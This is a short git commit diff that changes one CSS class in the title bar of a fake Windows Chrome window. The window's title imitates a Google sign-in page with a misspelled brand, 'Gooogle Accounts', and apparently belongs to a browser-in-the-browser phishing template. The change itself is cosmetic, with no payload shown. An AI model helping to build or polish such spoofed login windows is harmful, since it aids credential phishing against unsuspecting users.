:wrench: chore(Windows-Chrome): Fix fonts

--- a/Windows-Chrome/index.html
+++ b/Windows-Chrome/index.html
@@ -41,7 +41,7 @@
                             <span id="logo-description">Sign in - Gooogle Accounts</span>
                         </div>
     
-                        <div class="u-flex">
+                        <div class="u-overflow-hidden">
                             <span id="minimize">&#8212;</span>
                             <span id="square">□</span>
                             <span id="exit">✕</span>
